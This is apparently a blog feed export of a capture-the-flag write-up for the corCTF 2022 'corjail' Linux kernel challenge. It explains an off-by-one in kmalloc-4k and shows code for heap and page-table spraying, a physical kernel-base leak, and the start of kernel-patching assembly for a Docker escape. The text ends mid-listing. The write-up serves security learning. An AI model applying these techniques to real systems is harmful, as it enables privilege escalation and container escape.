/tags/kernel/ Recent content in Kernel on Uniguri's Blog Hugo -- gohugo.io en-us Sun, 06 Apr 2025 12:18:08 +0000 /posts/kernel/write-ups/ctf/corctf2022-corjail/ Sun, 06 Apr 2025 12:18:08 +0000 /posts/kernel/write-ups/ctf/corctf2022-corjail/ <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>linux version: <a href="https://elixir.bootlin.com/linux/v5.10.127/source"><code>5.10.127</code></a> <ul> <li>CONFIG_SLUB_DEBUG=y</li> <li>CONFIG_SLUB=y</li> <li>CONFIG_SLAB_FREELIST_RANDOM=y</li> <li>CONFIG_SLAB_FREELIST_HARDENED=y</li> </ul> </li> </ul> <h3 id="simple-description">Simple description</h3> <p>The goal of this challenge is escaping docker with seccomp-ed environment by using off-by-one in kmalloc-4k. The seccomp prohibits us to use <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/msg.h#L9"><code>struct msg_msg</code></a> and <a href="https://elixir.bootlin.com/linux/v5.10.127/source/ipc/msgutil.c#L37"><code>struct msg_msgseg</code></a>.</p> <p>So, we need to find new structure which makes us exploit off-by-one. And after making RIP control (ROP, or something&hellip;), we have to LPE and Escaping docker.</p> <h3 id="module">Module</h3> <p>The module is simple: just prints the count of each syscall called and makes us to filter which syscall&rsquo;s call count will be counted. It utilizes Syscall statistics patch based on <a href="https://lwn.net/Articles/896474/">https://lwn.net/Articles/896474/</a> (check out <code>build/build_kernel.sh</code>).</p> <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>linux version: <a href="https://elixir.bootlin.com/linux/v5.10.127/source"><code>5.10.127</code></a> <ul> <li>CONFIG_SLUB_DEBUG=y</li> <li>CONFIG_SLUB=y</li> <li>CONFIG_SLAB_FREELIST_RANDOM=y</li> <li>CONFIG_SLAB_FREELIST_HARDENED=y</li> </ul> </li> </ul> <h3 id="simple-description">Simple description</h3> <p>The goal of this challenge is escaping docker with seccomp-ed environment by using off-by-one in kmalloc-4k. The seccomp prohibits us to use <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/msg.h#L9"><code>struct msg_msg</code></a> and <a href="https://elixir.bootlin.com/linux/v5.10.127/source/ipc/msgutil.c#L37"><code>struct msg_msgseg</code></a>.</p> <p>So, we need to find new structure which makes us exploit off-by-one. And after making RIP control (ROP, or something&hellip;), we have to LPE and Escaping docker.</p> <h3 id="module">Module</h3> <p>The module is simple: just prints the count of each syscall called and makes us to filter which syscall&rsquo;s call count will be counted. It utilizes Syscall statistics patch based on <a href="https://lwn.net/Articles/896474/">https://lwn.net/Articles/896474/</a> (check out <code>build/build_kernel.sh</code>).</p> <p>I think this function is only one we must read: <div class="collapsable-code"> <input id="348591726" type="checkbox" checked /> <label for="348591726"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">corCTF2022-corjail-cormon_proc_write.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>int64_t cormon_proc_write(struct file *file, const char *src, size_t size, loff_t *ppos) { size_t v5; // rbp const char *v7; // rbx if (*ppos &lt; 0) return -22LL; if (size == 0 || (unsigned __int64)*ppos &gt; 0xFFF) return 0LL; if (size &gt; 0x1000) v5 = 4095LL; else v5 = size; v7 = (const char *)kmem_cache_alloc_trace( kmalloc_caches[12], 2592LL, 4096LL); // SLAB_CACHE = kmalloc-4096 (0x800 &lt; size &lt;= 0x1000) printk(&amp;unk_578, v7); if (v7) { _check_object_size(v7, v5, 0LL); if (copy_from_user(v7, src, v5)) { printk(&amp;unk_5D0, src); return -14LL; } else { v7[v5] = 0; // off-by-one when size=0x1000 -&gt; v5=0x1000 if ((unsigned int)update_filter(v7)) { kfree(v7); return -22LL; } else { kfree(v7); return size; } } } else { printk(&amp;unk_5A0, 0LL); return -12LL; } }</code></pre></div> </p> <h3 id="vulnerability">Vulnerability</h3> <p>As I wrote on above pseudocode, the vulnerability (off-by-one) is occurs at <code>v7[v5] = 0;</code>. Okay.. the off-by-one in kmalloc-4k is all of this challenge&hellip;</p> <h2 id="exploit">Exploit</h2> <p>Haha&hellip; okay&hellip; how we can exploit off-by-one in kmalloc-4k without <code>struct msg_msg</code>&hellip;? I tried 3 approaches and I solve it with last approach as a result (I think first one was too complex and second one does not works..).</p> <h3 id="first-approach-using-struct-poll_listhttpselixirbootlincomlinuxv510127sourcefsselectcl839">First approach (using <a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/select.c#L839"><code>struct poll_list</code></a>)</h3> <h4 id="finding-victim-object">Finding victim object</h4> <p>My first approach is exploit structure with first member is <code>struct ??? *next</code> or refcount like <code>atomic_t ???_count</code>, <code>atomic_long_t ???_count</code>, or etc. If the structure has next pointer, we can make UAF by releaseing the object and this is also same if it has recount.</p> <p>So I try finding these objects using <a href="https://codeql.github.com/">CodeQL</a>.</p> <div class="collapsable-code"> <input id="391468527" type="checkbox" checked /> <label for="391468527"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">corCTF2022-corjail-codeql_finding_target_struct.sql</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>import cpp from Field f, Type ty, PointerType p, FunctionCall call where ( call.getTarget().getName() = &#34;kmalloc&#34; or call.getTarget().getName() = &#34;kzalloc&#34; ) and call.getActualType() = p and p.refersTo(ty) and f.getByteOffset() = 0 and f.getDeclaringType() = ty and ( f.getType().getName() = &#34;list_head&#34; or f.getName().matches(&#34;%count%&#34;) or f.getType().refersToDirectly(ty) ) and ( ( call.getArgument(0).getValue().toInt() &gt; 2048 and call.getArgument(0).getValue().toInt() &lt;= 4096 ) or not call.getArgument(0).isConstant() ) select ty.getName(), ty.getLocation().toString(), call.getLocation().toString()</code></pre></div> <p>And the result is following:</p> <div class="collapsable-code"> <input id="217463859" type="checkbox" checked /> <label for="217463859"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">corCTF2022-corjail-codeql_finding_target_struct_result.txt</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>| col0 | col1 | col2 | +-------------------------+---------------------------------------------------------+-----------------------------------------------------+ | workqueue_struct | kernel/workqueue.c:239:8:239:23 | kernel/workqueue.c:4288:7:4288:13 | | posix_acl | include/linux/posix_acl.h:27:8:27:16 | fs/posix_acl.c:181:26:181:32 | | msg_msg | include/linux/msg.h:9:8:9:14 | ipc/msgutil.c:53:8:53:14 | | sem_undo | ipc/sem.c:146:8:146:15 | ipc/sem.c:1940:8:1940:14 | | list_head | include/linux/types.h:178:8:178:16 | fs/dcookies.c:236:22:236:28 | | list_head | tools/include/linux/types.h:69:8:69:16 | fs/dcookies.c:236:22:236:28 | | perf_buffer | kernel/events/internal.h:13:8:13:18 | kernel/events/ring_buffer.c:815:7:815:13 | | vmbus_channel_msginfo | include/linux/hyperv.h:707:8:707:28 | drivers/hv/channel.c:271:16:271:22 | | vmbus_channel_msginfo | include/linux/hyperv.h:707:8:707:28 | drivers/hv/channel.c:308:14:308:20 | | vmbus_channel_msginfo | include/linux/hyperv.h:707:8:707:28 | drivers/hv/channel.c:352:15:352:21 | | vmbus_channel_msginfo | include/linux/hyperv.h:707:8:707:28 | drivers/hv/vmbus_drv.c:2473:12:2473:18 | | blk_plug_cb | include/linux/blkdev.h:1262:8:1262:18 | block/blk-core.c:1743:7:1743:13 | | audit_tree | kernel/audit_tree.c:13:8:13:17 | kernel/audit_tree.c:97:9:97:15 | | apertures_struct | include/linux/fb.h:495:9:495:24 | include/linux/fb.h:509:6:509:12 | | Scsi_Host | include/scsi/scsi_host.h:524:8:524:16 | drivers/scsi/hosts.c:386:10:386:16 | | neighbour | include/net/neighbour.h:134:8:134:16 | net/core/neighbour.c:453:13:453:19 | | neighbour | include/net/neighbour.h:134:8:134:16 | net/core/neighbour.c:406:6:406:12 | | netdev_hw_addr | include/linux/netdevice.h:209:8:209:21 | net/core/dev_addr_lists.c:30:7:30:13 | | cpu_rmap | include/linux/cpu_rmap.h:24:8:24:15 | lib/cpu_rmap.c:39:9:39:15 | | poll_list | fs/select.c:839:8:839:16 | fs/select.c:1005:23:1005:29 | | hpets | drivers/char/hpet.c:104:8:104:12 | drivers/char/hpet.c:858:10:858:16 | | resource_entry | include/linux/resource_ext.h:23:8:23:21 | kernel/resource.c:1701:10:1701:16 | | journal_replay | drivers/md/bcache/journal.h:83:8:83:21 | drivers/md/bcache/journal.c:150:8:150:14 | | md_rdev | drivers/md/md.h:48:8:48:14 | drivers/md/raid0.c:149:18:149:24 | | hv_dr_state | drivers/pci/controller/pci-hyperv.c:517:8:517:18 | drivers/pci/controller/pci-hyperv.c:2266:7:2266:13 | | hv_dr_state | drivers/pci/controller/pci-hyperv.c:517:8:517:18 | drivers/pci/controller/pci-hyperv.c:2231:7:2231:13 | | iscsi_bus_flash_conn | include/scsi/scsi_transport_iscsi.h:318:8:318:27 | drivers/scsi/scsi_transport_iscsi.c:1286:15:1286:21 | | iscsi_bus_flash_session | include/scsi/scsi_transport_iscsi.h:363:8:363:30 | drivers/scsi/scsi_transport_iscsi.c:1237:15:1237:21 | | iscsi_cls_conn | include/scsi/scsi_transport_iscsi.h:202:8:202:21 | drivers/scsi/scsi_transport_iscsi.c:2401:9:2401:15 | | iscsi_cls_session | include/scsi/scsi_transport_iscsi.h:241:8:241:24 | drivers/scsi/scsi_transport_iscsi.c:2040:12:2040:18 | | tcmu_tmr | drivers/target/target_core_user.c:192:8:192:15 | drivers/target/target_core_user.c:1270:8:1270:14 | | ext4_xattr_inode_array | fs/ext4/xattr.h:119:8:119:29 | fs/ext4/xattr.c:2822:15:2822:21 | | fscache_cache_tag | include/linux/fscache-cache.h:43:8:43:24 | fs/fscache/cache.c:41:9:41:15 | | mr_table | include/linux/mroute_base.h:241:8:241:15 | net/ipv4/ipmr_base.c:41:8:41:14 | | pneigh_entry | include/net/neighbour.h:171:8:171:19 | net/core/neighbour.c:1714:23:1714:29 | | pneigh_entry | include/net/neighbour.h:171:8:171:19 | net/core/neighbour.c:737:6:737:12 | | fib_rule | include/net/fib_rules.h:20:8:20:15 | net/core/fib_rules.c:544:11:544:17 | | fib_rule | include/net/fib_rules.h:20:8:20:15 | net/core/fib_rules.c:60:6:60:12 | | msg_msgseg | ipc/msgutil.c:37:8:37:17 | ipc/msgutil.c:68:9:68:15 | | audit_chunk | kernel/audit_tree.c:25:8:25:18 | kernel/audit_tree.c:193:10:193:16 | | kprobe_insn_page | kernel/kprobes.c:90:8:90:23 | kernel/kprobes.c:172:8:172:14 | | kmalloced_param | kernel/params.c:39:8:39:22 | kernel/params.c:50:6:50:12 | | nested_table | lib/rhashtable.c:32:7:32:18 | lib/rhashtable.c:133:9:133:15 | | nf_queue_entry | include/net/netfilter/nf_queue.h:12:8:12:21 | net/netfilter/nf_queue.c:204:10:204:16 | | tls_rec | include/net/tls.h:99:8:99:14 | net/tls/tls_sw.c:337:8:337:14 | | nh_group | include/net/nexthop.h:75:8:75:15 | net/ipv4/nexthop.c:138:8:138:14 | | ctnl_timeout | include/net/netfilter/nf_conntrack_timeout.h:20:8:20:19 | net/netfilter/nfnetlink_cttimeout.c:133:12:133:18 | | recent_entry | net/netfilter/xt_recent.c:66:8:66:19 | net/netfilter/xt_recent.c:191:6:191:12 | | counted_str | security/apparmor/include/lib.h:93:8:93:18 | security/apparmor/lib.c:139:8:139:14 | | aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/domain.c:1404:9:1406:38 | | aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/domain.c:813:9:816:23 | | aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/domain.c:825:9:829:23 | | aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/label.c:428:8:428:14 | | aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/domain.c:1117:8:1119:37 | | aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/domain.c:895:9:897:25 | | aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/mount.c:707:11:709:27 | | aa_buffer | security/apparmor/lsm.c:47:7:47:15 | security/apparmor/lsm.c:1691:12:1691:18 | | aa_buffer | security/apparmor/lsm.c:47:7:47:15 | security/apparmor/lsm.c:1611:11:1611:17 | | ima_rule_opt_list | security/integrity/ima/ima_policy.c:63:8:63:24 | security/integrity/ima/ima_policy.c:288:13:288:19 |</code></pre></div> <p>I look up these structures and <a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/select.c#L839"><code>struct poll_list</code></a> is useful. Because it has <code>struct poll_list *next</code> at offset 0, it is allocated by <a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/select.c#L1067"><code>poll</code> system call</a>, and its size is provided by user.</p> <h4 id="how-to-spray-poll">How to spray poll?</h4> <p>I want to spray <code>struct poll_list</code> in kmalloc-4k. Therefore I can allocate it and release it when I want. But since the <code>poll</code> originally block the user program, we allocate it on other thread (actually we need to allocate it on other process).</p> <p>I tried it using <code>pthread_create</code> but the thread is not created. So I decide to use <code>clone</code></p> <div class="collapsable-code"> <input id="246518739" type="checkbox" checked /> <label for="246518739"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">corCTF2022-corjail-spray_poll.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>int create_poll(void *timeout_ms) { pin_to_core(0); const int timeout = (int)(int64_t)timeout_ms; const int size = (256 - 16) / 8 + (0x1000 - 16) / 8; struct pollfd *fds = malloc(size * sizeof(struct pollfd)); for (int i = 0; i &lt; size; i++) { fds[i].fd = 0xdead0000 + i; fds[i].events = POLLIN; } poll(fds, size, timeout); free(fds); } #define CLONE_STACK_HEAP_ALLOC_COUNT 1024 * 1024 int create_poll_via_clone(int timeout_ms) { char child_stack[CLONE_STACK_HEAP_ALLOC_COUNT]; int pid = clone(create_poll, child_stack, CLONE_VM | SIGCHLD, (void *)(int64_t)timeout_ms); return pid; }</code></pre></div> <h4 id="slubstickhttpswwwusenixorgconferenceusenixsecurity24presentationmaar-slubstick"><a href="https://www.usenix.org/conference/usenixsecurity24/presentation/maar-slubstick">SLUBStick</a></h4> <p>Now I can spray <code>struct poll_list</code> and trigger off-by-one. But as you know, we cannot ensure off-by-one will corrupt <code>struct poll_list</code>&rsquo;s <code>struct poll_list *next</code>.</p> <p>I decide to use SLUBStick for gathering <code>struct poll_list</code>s in one (or consecutive) slab cache. Originally SLUBStic is for a cross-cache attack and cross-cache attack requires that target objects must be in one slab cache.</p> <p>By using SLUBStick we can spray <code>struct poll_list</code>s on one (or consecutive) slab cache. And so off-by-one will be corrupt its next with high stability.</p> <h4 id="find-another-approace">Find another approace</h4> <p>At this time, I think how I can exploit using <code>struct poll_list</code>. My plain was following:</p> <ol> <li>Spray <code>struct poll_list</code> with its next is in kmalloc-8, kmalloc-16, kmalloc-32, kmalloc-64, kmalloc-128, kmalloc-192 (let me call it target cache from now on)</li> <li>Trigger off-by-one and make UAF in target cache</li> <li>Leak kernel base to bypass KASLR using object in target cache</li> <li>Do Cross-Cache attack on target cache and make UAF in kmalloc-1k (for using <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/tty.h#L285"><code>struct tty_struct</code></a>)</li> <li>Do ROP using <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/keys/user-type.h#L27"><code>struct user_key_payload</code></a> or other objects</li> </ol> <p>Hmm&hellip; This require cross-cache attack and its stability is low as we know. That&rsquo;s why I try another approach.</p> <p>PS. <a href="https://syst3mfailure.io/corjail/">the author&rsquo;s write-up</a> might do similar thing without cross-cache. Leak address of <code>struct tty_struct</code> using <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/tty.h#L347"><code>struct tty_file_private</code></a> and make UAF on that <code>struct tty_struct</code>. And do ROP.</p> <h3 id="second-approach-using-pagejackhttpsiblackhatcombh-us-24presentationsus24-qian-pagejack-a-powerful-exploit-technique-with-page-level-uaf-thursdaypdf">Second approach (using <a href="https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf">PageJack</a>)</h3> <p>After searching methods which can exploit off-by-one, I found <a href="https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf">PageJack</a>. It does not require bypass KASLR, corss-cache, and ETC and only require the off-by-one (or OOB write).</p> <p>WoW.. I tried it immediately&hellip;. But it does not works&hellip;. WHY?!?!</p> <h4 id="why-pagejack-does-not-work">Why PageJack does not work?</h4> <p>PageJack utilize <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/pipe_fs_i.h#L26"><code>struct page *page</code></a> of <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/pipe_fs_i.h#L26"><code>struct pipe_buffer</code></a>. With off-by-one (or OOB write) we can overwrite least significant byte of <code>page</code> and make physical page level UAF as a result.</p> <p>After page level UAF, spraying <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/fs.h#L916"><code>struct file</code></a> will make the UAF page <code>filp</code> cache (the <code>filp</code> cache uses only one page). The <code>struct file</code>s allocated on new <code>filp</code> cache (it&rsquo;s UAF page) and we have write primitive on it via pipe. We can modify <code>fmode_t f_mode</code> of <code>struct file</code> via pipe as a result.</p> <p>Everything is okay except the <code>const struct file_operations *f_op</code>. The write process is following:</p> <pre class="mermaid"> flowchart TD sys_write[sys_write] --&gt; ksys_write ksys_write[ksys_write] --&gt; vfs_write vfs_write[vfs_write] --&gt; write[file-&gt;f_op-&gt;write] vfs_write[vfs_write] --&gt; new_sync_write[new_sync_write] new_sync_write[new_sync_write] --&gt; write_iter[file-&gt;f_op-&gt;write_iter] click sys_write &#34;https://elixir.bootlin.com/linux/v5.10.127/source/fs/read_write.c#L667&#34; click ksys_write &#34;https://elixir.bootlin.com/linux/v5.10.127/source/fs/read_write.c#L647&#34; click vfs_write &#34;https://elixir.bootlin.com/linux/v5.10.127/source/fs/read_write.c#L585&#34; click new_sync_write &#34;https://elixir.bootlin.com/linux/v5.10.127/source/fs/read_write.c#L507&#34; click call_write_iter &#34;https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/fs.h#L1900&#34; </pre> <p>Unlike host environment, in docker container <code>f_op</code> is <a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/overlayfs/file.c#L764"><code>ovl_file_operations</code></a>. So, when call <code>file-&gt;f_op-&gt;write</code> or <code>file-&gt;f_op-&gt;write_iter</code>, the called function is not same as host and the <code>f_mode</code> is checked again in <a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/overlayfs/file.c#L350"><code>ovl_write_iter</code></a> (check it yourself!).</p> <img src="https://media1.tenor.com/m/kXWb4lofzQcAAAAC/hiroi-kikuri-hiroi.gif" alt="hiroi sad" class="center" style="border-radius: 8px;" /> <p>PS. the <a href="https://github.com/sajjadium/ctf-archives/tree/main/ctfs/Codegate/2025/Quals/pwn/pew">pew challenge</a> of CodeGate 2025 Qual is solved easily by <a href="https://github.com/Lotuhu/Page-UAF/blob/master/CVE-2021-22555/exp.c">PageJack PoC</a> (we need to modify the poc very very little).</p> <h3 id="last-approach-using-struct-pipe_bufferhttpselixirbootlincomlinuxv510127sourceincludelinuxpipe_fs_ihl26-and-dirty-page-tablehttpsyanglingxi1993githubiodirty_pagetabledirty_pagetablehtml">Last approach (using <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/pipe_fs_i.h#L26"><code>struct pipe_buffer</code></a> and <a href="https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html">Dirty Page Table</a>)</h3> <p>We cannot use PageJack but we can get physical page level UAF by using it partially. So, then, we can use <a href="https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html">Dirty Page Table</a>.</p> <h4 id="uaf-page-to-ptehttpsenwikipediaorgwikipage_tablepage_table_entry-page">UAF page to <a href="https://en.wikipedia.org/wiki/Page_table#Page_table_entry">PTE</a> page</h4> <p>We can spray <a href="https://en.wikipedia.org/wiki/Page_table#Page_table_entry">PTE</a>s via <code>mmap</code> and cause page fault by write to each memory. But I tried like below I failed to allocate PTEs on UAF page.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; i <span style="color:#f92672">&lt;</span> MMAP_SPRAY_COUNT; <span style="color:#f92672">++</span>i) { </span></span><span style="display:flex;"><span> mmap_addrs[i] <span style="color:#f92672">=</span> <span style="color:#a6e22e">mmap</span>((<span style="color:#66d9ef">void</span> <span style="color:#f92672">*</span>)(MMAP_SPRAT_START_ADDR <span style="color:#f92672">+</span> i <span style="color:#f92672">*</span> MMAP_SPRAT_STEP), </span></span><span style="display:flex;"><span> MMAP_SPRAT_SIZE, PROT_READ <span style="color:#f92672">|</span> PROT_WRITE, </span></span><span style="display:flex;"><span> MAP_ANONYMOUS <span style="color:#f92672">|</span> MAP_SHARED, <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>, <span style="color:#ae81ff">0</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (mmap_addrs[i] <span style="color:#f92672">==</span> MAP_FAILED) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">fatal</span>(<span style="color:#e6db74">&#34;mmap&#34;</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span><span style="color:#a6e22e">sched_yield</span>(); </span></span><span style="display:flex;"><span><span style="color:#a6e22e">close_pipe_at</span>(victim_pipe_fds[<span style="color:#ae81ff">1</span>]); <span style="color:#75715e">// Make UAF page </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; i <span style="color:#f92672">&lt;</span> MMAP_SPRAY_COUNT; <span style="color:#f92672">++</span>i) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> j <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; j <span style="color:#f92672">&lt;</span> MMAP_SPRAT_SIZE <span style="color:#f92672">/</span> MMAP_PAGE_SIZE; <span style="color:#f92672">++</span>j) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> <span style="color:#f92672">*</span>addr <span style="color:#f92672">=</span> (<span style="color:#66d9ef">uint64_t</span> <span style="color:#f92672">*</span>)(mmap_addrs[i] <span style="color:#f92672">+</span> MMAP_PAGE_SIZE <span style="color:#f92672">*</span> j); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">const</span> <span style="color:#66d9ef">uint64_t</span> val <span style="color:#f92672">=</span> ((<span style="color:#66d9ef">uint64_t</span>)i <span style="color:#f92672">&lt;&lt;</span> <span style="color:#ae81ff">32</span>) <span style="color:#f92672">+</span> j <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x01010101</span>; </span></span><span style="display:flex;"><span> <span style="color:#f92672">*</span>addr <span style="color:#f92672">=</span> val; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><p>Why this does not work..?? I don&rsquo;t know but the below code works&hellip;</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; i <span style="color:#f92672">&lt;</span> MMAP_SPRAY_COUNT; <span style="color:#f92672">++</span>i) { </span></span><span style="display:flex;"><span> mmap_addrs[i] <span style="color:#f92672">=</span> <span style="color:#a6e22e">mmap</span>((<span style="color:#66d9ef">void</span> <span style="color:#f92672">*</span>)(MMAP_SPRAT_START_ADDR <span style="color:#f92672">+</span> i <span style="color:#f92672">*</span> MMAP_SPRAT_STEP), </span></span><span style="display:flex;"><span> MMAP_SPRAT_SIZE, PROT_READ <span style="color:#f92672">|</span> PROT_WRITE, </span></span><span style="display:flex;"><span> MAP_ANONYMOUS <span style="color:#f92672">|</span> MAP_SHARED, <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>, <span style="color:#ae81ff">0</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (mmap_addrs[i] <span style="color:#f92672">==</span> MAP_FAILED) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">fatal</span>(<span style="color:#e6db74">&#34;mmap&#34;</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span><span style="color:#a6e22e">sched_yield</span>(); </span></span><span style="display:flex;"><span><span style="color:#a6e22e">close_pipe_at</span>(victim_pipe_fds[<span style="color:#ae81ff">1</span>]); <span style="color:#75715e">// Make UAF page </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; i <span style="color:#f92672">&lt;</span> FILE_SPRAY_COUNT; <span style="color:#f92672">++</span>i) { </span></span><span style="display:flex;"><span> file_fds[i] <span style="color:#f92672">=</span> <span style="color:#a6e22e">open</span>(<span style="color:#e6db74">&#34;/&#34;</span>, O_RDONLY); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (file_fds[i] <span style="color:#f92672">&lt;</span> <span style="color:#ae81ff">0</span>) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">fatal</span>(<span style="color:#e6db74">&#34;open&#34;</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; i <span style="color:#f92672">&lt;</span> FILE_SPRAY_COUNT; <span style="color:#f92672">++</span>i) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">close</span>(file_fds[i]); </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; i <span style="color:#f92672">&lt;</span> MMAP_SPRAY_COUNT; <span style="color:#f92672">++</span>i) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> j <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; j <span style="color:#f92672">&lt;</span> MMAP_SPRAT_SIZE <span style="color:#f92672">/</span> MMAP_PAGE_SIZE; <span style="color:#f92672">++</span>j) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> <span style="color:#f92672">*</span>addr <span style="color:#f92672">=</span> (<span style="color:#66d9ef">uint64_t</span> <span style="color:#f92672">*</span>)(mmap_addrs[i] <span style="color:#f92672">+</span> MMAP_PAGE_SIZE <span style="color:#f92672">*</span> j); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">const</span> <span style="color:#66d9ef">uint64_t</span> val <span style="color:#f92672">=</span> ((<span style="color:#66d9ef">uint64_t</span>)i <span style="color:#f92672">&lt;&lt;</span> <span style="color:#ae81ff">32</span>) <span style="color:#f92672">+</span> j <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x01010101</span>; </span></span><span style="display:flex;"><span> <span style="color:#f92672">*</span>addr <span style="color:#f92672">=</span> val; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><p>Any way using above code, we can modify PTEs for <code>mmap</code>ed memory via <code>pipe</code>.</p> <h4 id="leak-physical-kernel-base">Leak physical kernel base</h4> <p>Each PTE has its own flags and PFN(Page Frame Number; it&rsquo;s just <code>&lt;physical address&gt; &gt;&gt; 12</code>). And thus we can arbitrary read and write physical memory with modified PTE.</p> <p>So our approach is patch kernel code to escape docker and We need to know physical kernel base address for that. The linux loads kernel at different physical memory. But there is a way to leak it: dmabuf at <code>PA:0x9c000</code> (I don&rsquo;t know what is it and why there is it..). The physical kernel base will be <code>*( *(uint64_t*)(PA:0x9c000)&amp;(~0xfff) - 0x2004000ULL)</code>.</p> <p>PS. If KASLR is disabled, physical kernel base will be <code>*( *(uint64_t*)(PA:0x9c000)&amp;(~0xfff) - 0x2001000ULL)</code>.</p> <h4 id="patch-sys_modify_ldthttpselixirbootlincomlinuxv510127sourcearchx86kernelldtcl659">Patch <a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/kernel/ldt.c#L659">sys_modify_ldt</a></h4> <p>Now we can patch kernel&rsquo;s code. So I patch <code>modify_ldt</code> syscall and call it.</p> <p>The patched <code>modify_ldt</code> will be follwoing:</p> <div class="collapsable-code"> <input id="183976425" type="checkbox" checked /> <label for="183976425"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">corCTF2022-corjail-escape_docker.asm</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>// Compiled using https://defuse.ca/online-x86-assembler.htm // We need `endbr64` if CFI is enabled (check out https://en.wikipedia.org/wiki/Control-flow_integrity and https://en.wikipedia.org/wiki/Indirect_branch_tracking) call get_rip; get_rip: pop r15; sub r15, 0x252f0; // &amp;__x64_sys_modify_ldt - 